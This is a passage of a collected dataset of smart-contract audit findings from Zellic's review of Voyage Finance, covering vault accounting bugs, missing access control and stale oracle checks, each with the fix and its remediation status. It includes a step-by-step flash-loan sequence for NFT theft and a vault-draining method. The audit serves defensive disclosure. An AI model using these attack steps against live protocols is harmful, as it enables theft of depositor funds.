SeaportAdapter in commit 7937b13a. These are critical validation checks to have included, and we applaud Voyage for their efforts. However, there may still be other parameters that require validation checks in the orders, and we suggest Voyage perform a comprehensive review of all of the parameters to determine if there are any outstanding validation checks that may be necessary.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Missing timelocks can result in stolen NFTs", + "labels": [ + "Zellic" + ], + "body": "Target: VToken.sol Category: Business Logic Likelihood: High Severity: Critical Impact: Critical To start, there are no timelocks on the senior and junior depositor vaults. Furthermore, the share of vault assets lenders are entitled to when they withdraw is based on the share of assets at the time of deposit: function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; } And these funds are held in bonding until they are claimed: function claim() external { uint256 maxClaimable = unbondings[msg.sender].maxUnderlying; [...] This means a malicious user can potentially steal an outsized share of the principal and interest payments by manipulating their vault shares through deposits, withdraws, and claims. Given that a lender can also purchase an NFT, the above opens up a novel approach for NFT theft as follows: 1. Take out a flash loan. 2.
Call deposit(...) - make a large vault deposit and get awarded an outsized number of shares (shares are proportional to total asset share). 3. Call buyNFT(...) - purchase an NFT by making the first principal and interest payments. 4. Call withdraw(...) - with a large enough flash loan, you should be able to lock for withdrawal the majority of the principal and interest payments you just made. 5. Call claim(...) - remove your funds from the vault and pay back your flash loan. You will need a separate source of funds to pay interest on the flash loan (longer-term loan, whale). 6. Repeat steps 2, 4, and 5 until the maturity of the loan has passed. 7. Call withdrawNFT(...) to take possession of your NFT. Sell it and repay any outstanding debts. The vector above can be blocked by preventing lenders from also purchasing NFTs; however, this would be a naive fix. The ability to deposit and withdraw funds without timelocks in order to create a maxClaimable slip that can be used to claim interest and principal payments at any time is a fundamental design flaw. It means depositors can game the system, claiming principal and interest payments for which they hold no credit risk. We suggest implementing a timelock mechanism on depositors\u2019 shares to ensure they are \u201cpaying their dues.\u201d This will help ensure depositors take on levels of credit risk commensurate with their returns. It is true that depositors who come in at later dates may end up covering losses on assets lent out earlier; our interpretation is that this is part of the pooling design. However, we feel the ability to game this exposure is a design flaw and should be removed. Commit a5bfd675 was indicated as containing the remediation. Reviewing the remediation for this issue has proven to be challenging due to the pace of the development. A total of 181 commits exist between the commit under review and a5bfd675; the diff between the two commits amounts to 43 Solidity files changed, with 2,416 insertions and 1,684 deletions. The issue appears to be correctly fixed at the given commit. We largely based this evaluation on the description provided by the Voyage team due to the considerable amount of changes, which aligns with what can be observed in the commits. In particular, the code tracking the balances of the amounts deposited by the users has been updated to keep track of the unbonding amounts; further, we observed no anomalies in the evolution of the balances during the execution of a proof of concept developed to demonstrate the issue when executed against the commit containing the remediation. We note that it is still technically possible to reclaim a disproportionate amount of the interest portion of the installments by depositing a very large amount of assets before buying an NFT and withdrawing after repayments are made. The Voyage team has argued that this strategy does not seem to be exploitable to gather a profit. Their assessment is likely to be correct for the economic conditions in which Voyage is expected to operate, although profitability might be possible if some parameters such as flash loan interest rates, Voyage pool asset sizes, and NFT values were to assume unexpected values.",
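A minimal sketch of the suggested timelock mechanism, assuming a fixed unbonding delay keyed to the last deposit; every name and constant here is hypothetical and only meant to show one possible shape of the safeguard, not Voyage's actual remediation:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Sketch: withdrawals unlock only a fixed delay after the user's last
// deposit, so atomic deposit-then-withdraw gaming is impossible.
abstract contract TimelockedVaultSketch {
    uint256 public constant UNBONDING_DELAY = 7 days; // hypothetical value

    mapping(address => uint256) internal lastDepositAt;

    error StillLocked(uint256 unlockTime);

    function _recordDeposit(address user) internal {
        lastDepositAt[user] = block.timestamp;
    }

    function _checkUnlocked(address user) internal view {
        uint256 unlockTime = lastDepositAt[user] + UNBONDING_DELAY;
        if (block.timestamp < unlockTime) revert StillLocked(unlockTime);
    }
}
```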
Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Junior depositor funds mistakenly sent to senior depositors", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: Critical : Critical Calls to liquidate(...))) made when the discounted price of the underlying NFT is greater than the price paid when buying it will move funds from junior depositors and send them to senior depositors. In liquidate(...))), param.remaningDebt = param.totalDebt; /) [...))] param.receivedAmount = discountedFloorPriceInTotal; /) [...))] if (param.totalDebt > discountedFloorPriceInTotal) { param.remaningDebt = param.totalDebt - discountedFloorPriceInTotal; } else { uint256 refundAmount = discountedFloorPriceInTotal - param.totalDebt; IERC20(param.currency).transfer(param.vault, refundAmount); param.receivedAmount -= refundAmount; } If param.totalDebt > discountedFloorPriceInTotal, then param.receivedAmount = pa ram.totalDebt and param.remaningDebt = param.totalDebt. The following code will therefore execute the following: if (param.remaningDebt > 0) { param.totalAssetFromJuniorTranche = ERC4626( reserveData.juniorDepositTokenAddress ).totalAssets(); if (param.totalAssetFromJuniorTranche >= param.remaningDebt) { IVToken(reserveData.juniorDepositTokenAddress) .transferUnderlyingTo(address(this), param.remaningDebt); param.juniorTrancheAmount = param.remaningDebt; param.receivedAmount += param.remaningDebt; } else { Zellic Voyage Finance IVToken(reserveData.juniorDepositTokenAddress) .transferUnderlyingTo( address(this), param.totalAssetFromJuniorTranche ); param.juniorTrancheAmount = param.totalAssetFromJuniorTranche; param.receivedAmount += param.totalAssetFromJuniorTranche; param.writeDownAmount = param.remaningDebt - param.totalAssetFromJuniorTranche; } } It can be verified that param.receivedAmount = 2 * param.totalDebt or param.receive dAmount = param.totalDebt + param.totalAssetFromJuniorTranche depending on whether param.totalAssetFromJuniorTranche >) param.remaningDebt. Voyage will be in possession of assets equal to param.receivedAmount; furthermore, param.receivedAmount will be sent to the senior depositors: IERC20(param.currency).safeTransfer( reserveData.seniorDepositTokenAddress, param.receivedAmount ); The finding has been rated as critical because it could have catastrophic consequences for the performance of the protocol. 1. Junior depositors would be missing funds with potentially no explanation. This is likely to be realized by users over time and may result in near complete aban- donment of the junior tranche and hence loss of core protocol functionality and purpose. 2. It would raise the prospect of additional yet unfound issues that could end up affecting senior depositors. This could result in a complete loss of confidence in the project and team. Make the following code change in liquidate(...))): Zellic Voyage Finance } else { uint256 refundAmount = discountedFloorPriceInTotal - param.totalDebt; IERC20(param.currency).transfer(param.vault, refundAmount); param.receivedAmount -= refundAmount; param.remaningDebt = 0; } Voyage has since made considerable changes to the code base in order to funda- mentally alter the way funds are distributed in the event of liquidations. 
We view the changes to the code base as extending beyond remediation efforts targeting the basic coding mistake we have identified and as constituting extensions to the code base that would require extending the scope of the audit engagement. For context, 81 commits were made between the scoping of the audit and the remediation commit provided by Voyage, 654a9242. Across these commits, a total of 30 Solidity files have been changed, with a total of 1,406 insertions and 1,008 deletions. Out of respect for the scope of the initial engagement, we have not been able to fully audit these changes and confirm whether the underlying issue identified here has indeed been remediated. However, we can confirm that Voyage has acknowledged the issue and has claimed to have fixed it in these architectural changes.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Inconsistent usage of totalUnbonding leads to lost or underutilized lender assets", + "labels": [ + "Zellic" + ], + "body": "Target: Vtoken.sol Category: Business Logic Likelihood: High Severity: Critical Impact: Critical Functions in VToken assume the variable totalUnbonding keeps track of the total amount of underlying shares in the unbonding state. However, the rest of the Voyage protocol assumes this variable keeps track of the amount of underlying asset in the unbonding state. For example, VToken::pushWithdraw(...) uses shares: function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; } Whereas JuniorDepositToken::totalAssets() assumes the variable expresses an amount of the underlying asset: contract JuniorDepositToken is VToken { function totalAssets() public view override returns (uint256) { return asset.balanceOf(address(this)) - totalUnbonding; } } This issue has far-reaching consequences, as it influences the amount of assets deposited to both the senior and junior pools. Depending on the exchange rate used to convert between assets and shares, totalUnbonding could become greater or smaller than the correct value. For example, if convertToAssets(_shares) > _shares then totalUnbonding will be set to a lower-than-intended amount by pushWithdraw(...). This means that Voyage will assume the pool has more assets available than it really does. So, for example, liquidity checks in buyNow(...) will pass when they should not, and purchase orders can mysteriously fail. Additionally, assets locked by lenders for withdrawal will still be lent out. This can lead to calls to claim(...) failing and lost assets for lenders. If convertToAssets(_shares) < _shares then totalUnbonding is instead set to a greater-than-intended value by pushWithdraw(...). Voyage will therefore assume the pool has fewer assets than it really does. Depositor assets will become underutilized by borrowers, and depending on the magnitude of the difference, funds could become effectively locked. Moreover, since totalUnbonding factors into SeniorDepositToken::totalAssets(...), this can also have an impact on the general accuracy of deposit and withdraw calculations, as the conversion ratio between shares and assets depends on the value returned by totalAssets(...). Consistently use totalUnbonding to express an amount of assets or an amount of shares.
Assuming the variable is intended to keep track of an amount of assets, at least two modifications to the code would have to be made. One to VToken::pushWithdraw(...): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; /* old */ totalUnbonding += convertToAssets(_shares); /* new */ } And another to VToken::claim(): function claim() external { // [...] if (availableLiquidity > maxClaimable) { // [...] } else { // [...] } totalUnbonding -= transferredShares; /* old */ totalUnbonding -= convertToAssets(transferredShares); /* new */ asset.safeTransfer(msg.sender, transferredAsset); } Commits 3320ba3c and acbe5001 were indicated as containing remediations for this issue. Reviewing the remediation for this issue has proven to be challenging due to the pace of the development. A total of 29 commits exist between the commit under review and 3320ba3c; the diff between the two commits amounts to 24 Solidity files changed, with 324 insertions and 525 deletions. Another 86 commits exist between 3320ba3c and acbe5001, with a diff amounting to 29 Solidity files changed, 1,279 insertions, and 969 deletions. The two commits appear to correctly fix the issue; we largely based this evaluation on the description of the applied changes provided by the Voyage team due to the considerable amount of changes, which seems compatible with what can be observed in the commits. The totalUnbonding function is not used anymore in the computation of totalAssets; two other functions, totalUnbondingAsset and unbonding, were introduced, respectively computing the amount of assets and shares that are in the unbonding state.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Share burn timing in Vtoken can lead to complete loss of funds", + "labels": [ + "Zellic" + ], + "body": "Target: Vtoken.sol Category: Business Logic Likelihood: High Severity: Critical Impact: Critical In general, the ERC4626 vault uses the current ratio of total shares to total assets for pricing: conversions from assets to shares for deposits and conversions from shares to assets for withdrawals. The VToken vault in Voyage implements a novel two-step withdrawal process. Users first call withdraw(\u2026), which calls pushWithdraw(\u2026), to record the number of shares being withdrawn and the corresponding value in asset terms and to reserve the total amount of assets being withdrawn by updating totalUnbonding. In the current implementation, _burn(\u2026) occurs before this call is made: shares = previewWithdraw(_amount); // No need to check for rounding error, previewWithdraw rounds up. if (msg.sender != _owner) { _spendAllowance(_owner, msg.sender, shares); } beforeWithdraw(_amount, shares); _burn(_owner, shares); pushWithdraw(_owner, shares); This inadvertently alters the total shares and hence the conversion from shares to assets that occurs in pushWithdraw(\u2026): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; } Users then call claim(\u2026) in order to receive their funds. For the case where availableLiquidity > maxClaimable, the incorrect conversion from the previous step will carry over.
Furthermore, if availableLiquidity <= maxClaimable, another conversion will also be based on an incorrect total shares: if (availableLiquidity > maxClaimable) { transferredAsset = maxClaimable; transferredShares = unbondings[msg.sender].shares; resetUnbondingPosition(msg.sender); } else { transferredAsset = availableLiquidity; uint256 shares = convertToShares(availableLiquidity); reduceUnbondingPosition(shares, transferredAsset); transferredShares = shares; } Calling deposit(...) and withdraw(...) in the same transaction repeatedly can lead to draining of the tranches. For example, in general, let a deposit of assets of amount equal to assetDeposited result in an amount of shares equal to sharesReceived being sent to the depositor. It is expected behavior (and has been verified) that an immediate call (same transaction) to withdraw(...) made with assetDeposited will set the amount of shares to be burned as sharesReceived: function withdraw( uint256 _amount, address _receiver, address _owner ) public override(ERC4626, IERC4626) returns (uint256 shares) { shares = previewWithdraw(_amount); // No need to check for rounding error, previewWithdraw rounds up. beforeWithdraw(_amount, shares); _burn(_owner, shares); pushWithdraw(_owner, shares); emit Withdraw(msg.sender, _receiver, _owner, _amount, shares); The call to _burn(...) in withdraw(...) reduces the totalSupply of shares by sharesReceived, so that the call to pushWithdraw(...) overprices the asset when calculating the amount of asset owed to the depositor in unbondings[_user].maxUnderlying += convertToAssets(_shares) and also reserves the assets for withdrawal in totalUnbonding += convertToAssets(_shares): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += convertToAssets(_shares); } The call to convertToAssets(_shares) necessarily overprices the asset. We have fully proven this mathematically, but there is a sufficiently strong intuitive argument. The price of shares in units of assets is based on the ratio of the balance of assets to shares. From the base implementation of ERC4626 we have function convertToAssets(uint256 shares) public view virtual returns (uint256) { uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero. return supply == 0 ? shares : shares.mulDivDown(totalAssets(), supply); } Therefore, if the supply is reduced by a premature _burn(...), we necessarily overinflate the amount of assets the depositor can withdraw. This allows an attacker to drain the funds from the vaults through repeated atomic deposit(...) + withdraw(...) transactions. Move share burning to the end of claim(...) as suggested below: if (availableLiquidity > maxClaimable) { transferredAsset = maxClaimable; transferredShares = unbondings[msg.sender].shares; resetUnbondingPosition(msg.sender); } else { transferredAsset = availableLiquidity; uint256 shares = convertToShares(availableLiquidity); reduceUnbondingPosition(shares, transferredAsset); transferredShares = shares; } totalUnbonding -= transferredAsset; asset.safeTransfer(msg.sender, transferredAsset); _burn(_owner, transferredShares); } This positioning should also avoid conflicts with other processes in Voyage. Voyage has moved the call to _burn so that it occurs after the reduction in the unbonding position in claim in commit 63099db1.
This aligns the implementation with the intended design and avoids overvaluing the assets in the preview and conversion functions.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Buyers make first interest payment twice", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: High Impact: High Callers of buyNow(...) will always pay the first interest payment twice. The first time happens when they pay the down payment\u2014they can pay it in either ETH or WETH. The down payment is equal to params.downpayment = params.pmt.pmt, where pmt is given by function calculatePMT(Loan storage loan) internal view returns (PMT memory) { PMT memory pmt; pmt.principal = loan.principal / loan.nper; pmt.interest = loan.interest / loan.nper; pmt.pmt = pmt.principal + pmt.interest; return pmt; } The second time happens when distributeInterest(...) is called: LibLoan.distributeInterest( reserveData, params.pmt.interest, _msgSender() ); This pulls the same amount, but only WETH, directly from the buyer. Users will be discouraged from using the protocol due to the extra large payment arising from high interest rates. Remove the interest component from the down payment. Commit 3320ba3c was indicated as containing the remediation for this issue. The params.downpayment variable is now set to params.pmt.principal instead of params.pmt.pmt, meaning it will contain the value corresponding to the principal (without interest) of a single installment. We note that a total of 29 commits exist between the commit under review and 3320ba3c; the diff between the two commits amounts to 24 Solidity files changed, with 324 insertions and 525 deletions, containing other potentially relevant changes.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.9 Missing stale price oracle check results in outsized NFT price risk", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: Medium Severity: High Impact: High The price oracle stores the average price of NFTs in a given collection. Calls to updateTwap(...) set the average price and the block.timestamp: function updateTwap(address _currency, uint256 _priceAverage) external auth { prices[_currency].priceAverage = _priceAverage; prices[_currency].blockTimestamp = block.timestamp; } The timestamp is returned from calls to getTwap(...): function getTwap(address _currency) external view returns (uint256, uint256) { return ( prices[_currency].priceAverage, prices[_currency].blockTimestamp ); } Unfortunately, the timestamp is never used in buyNow(...). Since the protocol expects only NFTs satisfying the following two conditions to be purchased, if (params.fv == 0) { revert InvalidFloorPrice(); } if (params.fv < params.totalPrincipal) { revert InvalidPrincipal(); } an out-of-date price oracle means these conditions could be violated.
Furthermore, there are no stale price checks in liquidate(\u2026): IPriceOracle priceOracle = IPriceOracle( reserveData.priceOracle.implementation() ); (param.floorPrice, param.floorPriceTime) = priceOracle.getTwap( param.collection ); if (param.floorPrice == 0) { revert InvalidFloorPrice(); } [...] param.totalDebt = param.principal; param.remaningDebt = param.totalDebt; param.discount = getDiscount(param.floorPrice, param.liquidationBonus); param.discountedFloorPrice = param.floorPrice - param.discount; uint256 discountedFloorPriceInTotal = param.discountedFloorPrice * collaterals.length; IERC20(param.currency).safeTransferFrom( param.liquidator, address(this), discountedFloorPriceInTotal ); If an NFT was purchased with a price greater than the average price (i.e., params.fv < params.totalPrincipal), then lenders may end up backing much riskier assets than intended. Additionally, if stale prices are below current prices, a liquidator would be able to purchase the NFTs at a discount and sell them for a profit. On the other hand, if stale prices were above market prices, NFTs could stay locked in the system. The utility of credit products for users depends immensely on good alignment between the underlying credit dynamics and user expectations. This logic error can result in a rate of loan defaults that is largely outsized to investor expectations. Additionally, upon liquidation it can also result in vault loss of funds through selling NFTs at submarket prices. Introduce stale price checks in buyNow(...) and liquidate(...). The protocol operators need to determine the appropriate length of the time window to be accepted for the last average price. Because these are NFT markets, it is important to ensure the window is long enough so that it reflects a sufficient number of trades while at the same time not including out-of-date trades. Voyage has introduced stale price checks in both buyNow(...) and liquidate(...) in the following commits: 80a681a2 and 654a9242.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Calls to redeem(...) can result in lost depositor funds", + "labels": [ + "Zellic" + ], + "body": "Target: VToken.sol Category: Business Logic Likelihood: Medium Severity: High Impact: Medium We would like to credit Voyage for finding the following critical exploit while the audit was ongoing and in its early stages. Calls to the base ERC4626 redeem(...) can be made by anyone. Unfortunately, redeem(...) does not implement any of the pushWithdraw(...) logic: function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += convertToAssets(_shares); } Any calls to claim after calling redeem(...) would result in no funds being transferred to the user. We suggest modifying redeem(...) to incorporate the pushWithdraw(...) functionality accordingly. Commit 2ebf6278 was indicated as containing the remediation. The issue appears to be correctly fixed in the given commit, having redeem implement the correct logic, including a call to pushWithdraw. We note that the actual remediation was performed in 3320ba3c and that 2ebf6278 actually performs a minor refactoring on the lines responsible for the fix.
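One possible shape of the suggested redeem(...) fix is sketched below; the virtual helpers stand in for the VToken/ERC4626 internals quoted in the report, and the burn timing follows the correction from finding 3.7 rather than the original withdraw(...) ordering. This is an illustration, not the code of commit 2ebf6278:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Sketch: route redeem() through the same two-step unbonding accounting
// as withdraw(), so a later claim() actually pays out.
abstract contract VTokenRedeemSketch {
    event Withdraw(address indexed caller, address indexed receiver,
        address indexed owner, uint256 assets, uint256 shares);

    function previewRedeem(uint256 shares) public view virtual returns (uint256);
    function _spendAllowance(address owner, address spender, uint256 shares) internal virtual;
    function beforeWithdraw(uint256 assets, uint256 shares) internal virtual;
    function pushWithdraw(address user, uint256 shares) internal virtual;

    function redeem(
        uint256 _shares,
        address _receiver,
        address _owner
    ) public virtual returns (uint256 assets) {
        assets = previewRedeem(_shares);
        if (msg.sender != _owner) _spendAllowance(_owner, msg.sender, _shares);
        beforeWithdraw(assets, _shares);
        // Record the unbonding position; per finding 3.7, the share burn
        // itself belongs at claim() time, not here.
        pushWithdraw(_owner, _shares);
        emit Withdraw(msg.sender, _receiver, _owner, assets, _shares);
    }
}
```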
3.11 Incorrect calculation in refundGas Target: Vault.sol Category: Business Logic Likelihood: High Severity: Medium Impact: Medium The Vault::refundGas function performs an incorrect calculation of the amountRefundable variable if the WETH amount to unwrap is greater than the available balance. The code is reported below for convenience: function refundGas(uint256 _amount, address _dst) external onlyPaymaster { uint256 amountRefundable = _amount; uint256 ethBal = address(this).balance; // we need to unwrap some WETH in this case. if (ethBal < _amount) { IWETH9 weth9 = IWETH9(LibVaultStorage.ds().weth); uint256 balanceWETH9 = weth9.balanceOf(address(this)); uint256 toUnwrap = _amount - ethBal; // this should not happen, but if it does, we should take what we can instead of reverting if (toUnwrap > balanceWETH9) { weth9.withdraw(balanceWETH9); amountRefundable = amountRefundable - toUnwrap - balanceWETH9; } else { weth9.withdraw(toUnwrap); } } // [code continues...] Consider the following numerical example: _amount is 100, ethBal is 60, and balanceWETH9 is 30. toUnwrap will be calculated as 100 - 60 = 40, and amountRefundable will be calculated as 100 - 40 - 30 = 30, instead of the expected 90. The function will refund to the treasury less than the expected amount. Fix the calculation by applying parentheses around toUnwrap - balanceWETH9 on the line calculating amountRefundable. Voyage has followed the recommendation and corrected the calculation in commit 6e44df5f.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Missing access control on postRelayedCall leading to ETH transfer from Vault", + "labels": [ + "Zellic" + ], + "body": "Target: VoyagePaymaster.sol Category: Business Logic Likelihood: High Severity: High Impact: Medium The VoyagePaymaster::postRelayedCall function is lacking any access control check. The function invokes refundGas on a vault supplied by the caller to refund a caller-controlled amount of ETH to the treasury address. function postRelayedCall( bytes calldata context, bool success, uint256 gasUseWithoutPost, GsnTypes.RelayData calldata relayData ) external virtual override { address vault = abi.decode(context, (address)); // calldata overhead = 21k + non_zero_bytes * 16 + zero_bytes * 4 // ~= 21k + calldata.length * [1/3 * 16 + 2/3 * 4] uint256 minimumFees = (gasUseWithoutPost + 21000 + msg.data.length * 8 + REFUND_GAS_OVERHEAD) * relayData.gasPrice; uint256 refund = vault.balance >= minimumFees ? minimumFees : minimumFees + 21000 * relayData.gasPrice; // cover cost of unwrapping WETH IVault(vault).refundGas(refund, treasury); } A malicious user can invoke postRelayedCall to transfer ETH from any vault to the treasury address. Apply strict access control to the function. Commit 791b7e63 was indicated as containing the remediation. The commit correctly fixes the issue by enforcing access control on postRelayedCall.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Functions cannot be removed during upgrades", + "labels": [ + "Zellic" + ], + "body": "Target: DiamondVersionFacet.sol Category: Business Logic Likelihood: Medium Severity: Medium Impact: Medium In getUpgrade(...), the array bytes4[] storage existingSelectors = LibAppStorage.ds().upgradeParam.existingSelectors[msg.sender]; is never populated with values.
Therefore, the following loop to set the remove functions will never initiate: for (uint256 i = 0; i < existingSelectors.length; ) { if (!newSelectorSet[existingSelectors[i]]) { LibAppStorage.ds().upgradeParam.selectorsRemoved[i].push( existingSelectors[i] ); } And the final IDiamondCut.FacetCut[] returned will not contain any of the remove instructions. It will not be possible to remove functions from Voyage\u2019s interface using the intended functionality. It would be possible, however, to replace them with functions that do not perform any operations. This approach will, however, result in a very cluttered and confusing interface and should be avoided. Populate existingSelectors by adding existingSelectors.push(selector) to the following loop: for (uint256 i = 0; i < currentFacets.length; ) { IDiamondLoupe.Facet memory facet = currentFacets[i]; for (uint256 j = 0; j < facet.functionSelectors.length; ) { bytes4 selector = facet.functionSelectors[j]; newSelectors.push(selector); existingSelectorFacetMap[selector] = facet.facetAddress; existingSelectors.push(selector); unchecked { ++j; } } unchecked { ++i; } } The upgrade functionality has been dropped entirely from the project; the issue has therefore been remediated.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.14 Missing access control on multiple PaymentsFacet functions", + "labels": [ + "Zellic" + ], + "body": "Target: PaymentsFacet.sol Category: Business Logic Likelihood: High Severity: High Impact: Low Multiple functions in PaymentsFacet are lacking any access control checks: unwrapWETH9 unwraps and sends WETH owned by Voyage to an arbitrary address; wrapWETH9 wraps all the ETH balance owned by Voyage into WETH; sweepToken transfers any ERC20 token owned by Voyage to an arbitrary address; refundETH transfers all the ETH balance owned by Voyage to msg.sender. Those functions can be used to steal or transfer ETH and ERC20 assets held by the main Voyage contract. The contract only holds assets temporarily while processing transactions (e.g., buyNow), so an attacker cannot generally gain anything by using them. However, since there is no reentrancy guard, there is a risk of an attacker finding a way to reenter the contract while the contract is holding some assets. Since these functions are not meant to be publicly exposed, they represent an unnecessary risk. We recommend enforcing access control to restrict usage only to the intended user. Commit 9a2e8f42 was indicated as containing the remediation. The issue is correctly fixed in the given commit. The four functions have been marked as internal.",
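As context for this remediation pattern, a sketch of the library shape follows; once a helper is an internal library function, it is compiled into the calling facet and exposes no external entry point. The interface and names here are illustrative only, not Voyage's actual code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical WETH interface for the sketch.
interface IWETH9Sketch {
    function withdraw(uint256 amount) external;
}

// Sketch: internal library functions are only reachable from facets that
// deliberately call them, removing the public attack surface.
library LibPaymentsSketch {
    function unwrapWETH9(
        IWETH9Sketch weth,
        uint256 amount,
        address payable recipient
    ) internal {
        weth.withdraw(amount);
        (bool ok, ) = recipient.call{value: amount}("");
        require(ok, "ETH send failed");
    }
}
```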
Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.15 Multicall can be used to call buyNow with untrusted msg.va lue", + "labels": [ + "Zellic" + ], + "body": "Target: Multicall.sol, LoanFacet.sol Category: Coding Mistakes Likelihood: High Severity: High : Low The main Voyage contract also exposes the methods of the Multicall contract via this chain: Voyage is an instance of Diamond (by inheritance) Diamond allows to delegatecall any registered facet \u2013 One of the facets is PaymentsFacet PaymentsFacet is multicall by inheritance \u2013 Multicall has a multicall method that performs an arbitrary amount of delegatecalls to address(this), with arbitrary calldata Any function called by multicall must not trust msg.value, since Multicall allows to perform multiple calls in the same transaction, preserving the same msg.value. A function trusting msg.value might assume that the contract has received msg.value ETH from the caller and can spend it exclusively, which is not true in case the function is called multiple times in the same transaction by leveraging multicall. Multicall allows to call any method exposed by any Voyage facet, including LoanFacet: :buyNow, which assumes that msg.value ETH were sent by the caller as down payment for the requested NFT. The buyNow function assumes the caller has sent msg.value ETH as down payment for the NFT. Luckily, an attacker cannot exploit this flawed assumption and use funds from the protocol pools to buy NFTs at a reduced price, as the contract will not have enough ETH to buy the NFT, causing a revert. Adopt an explicit allowlist to limit which functions can be invoked by Multicall and ensure msg.value is not used by any of these functions. The buyNow function is the only one using msg.value in the commit under review. Zellic Voyage Finance Multicalls and self permit have been removed from the code base entirely, the issue has therefore been remediated. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.16 The maxWithdraw functionality is broken", + "labels": [ + "Zellic" + ], + "body": "Target: LiquidityFacet.sol Category: Business Logic Likelihood: High Severity: Low : Low Depositors will be unable to use the intended maxWithdraw functionality in withdra w(...))): uint256 userBalance = vToken.maxWithdraw(msg.sender); uint256 amountToWithdraw = _amount; if (_amount == type(uint256).max) { amountToWithdraw = userBalance; } BorrowState storage borrowState = LibAppStorage.ds()._borrowState[ _collection ][reserve.currency]; uint256 totalDebt = borrowState.totalDebt + borrowState.totalInterest; uint256 avgBorrowRate = borrowState.avgBorrowRate; IVToken(vToken).withdraw(_amount, msg.sender, msg.sender); Users will need to make withdraw requests for exact amounts in order to retrieve all of their deposited funds. If the _amount provided in the function call exceeds the available balance, the function will fail with no clear error message. This can create a frustrating and unexpected user experience. 
Change IVToken(vToken).withdraw(_amount, msg.sender, msg.sender); to IVToken(vToken).withdraw(amountToWithdraw, msg.sender, msg.sender); Also, modify the _amount check to the following: if (_amount == type(uint256).max || _amount > userBalance) { amountToWithdraw = userBalance; } Commits aac23ae9 and 0e00c990 were indicated as containing the remediation. The commits correctly fix the issue by applying the suggested remediations.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.17 Calls to previewBuyNow(...) do not return correct order previews", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: Low Impact: Low The implemented functionality to preview NFT orders is incomplete. For example, the call below does not pass the _data and _tokenIds, which are required to determine the totalPrincipal. As it currently stands, even the most critical fields like totalPrincipal are not populated: function previewBuyNowParams(address _collection) public view returns (ExecuteBuyNowParams memory) { ExecuteBuyNowParams memory params; ReserveData memory reserveData = LibLiquidity.getReserveData( _collection ); ReserveConfigurationMap memory reserveConf = LibReserveConfiguration .getConfiguration(_collection); (params.epoch, params.term) = reserveConf.getBorrowParams(); params.nper = params.term / params.epoch; params.outstandingPrincipal = params.totalPrincipal - params.totalPrincipal / params.nper; There is a high probability that users would rely on the intended functionality of previewBuyNow(...) to improve their user experience. Currently, the operation is non-functional, and users would not be able to preview orders. This could discourage user engagement. We suggest fully specifying the desired functionality in previewBuyNow(...) and then updating the function accordingly. For example, parameters like _data and _tokenId should be passed to return the purchase price of the NFT and the average trading price of the NFTs in the collection. This would further allow fields like params.totalPrincipal to be populated and hence result in correct interest rate calculations. Voyage has refactored the function to populate a new struct PreviewBuyNowParams in commit f3db2541. It has been verified that the struct has been populated in the following commits: 2f4da9c9 and e1892115.", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.18 Public approve function allows to give approval for any ERC20 tokens held by Voyage", + "labels": [ + "Zellic" + ], + "body": "Target: PeripheryPayments.sol Category: Coding Mistakes Likelihood: High Severity: Low Impact: Low The PeripheryPayments::approve function does not perform any access control and can be used to invoke approve on any token on behalf of the Voyage contract. function approve( IERC20 token, address to, uint256 amount ) public payable { token.safeApprove(to, amount); } Furthermore, we have two additional observations about this function: It is unnecessarily marked as payable. It allows calling approve on any contract, not just ERC20; since ERC721 tokens also have a compatible approve function, 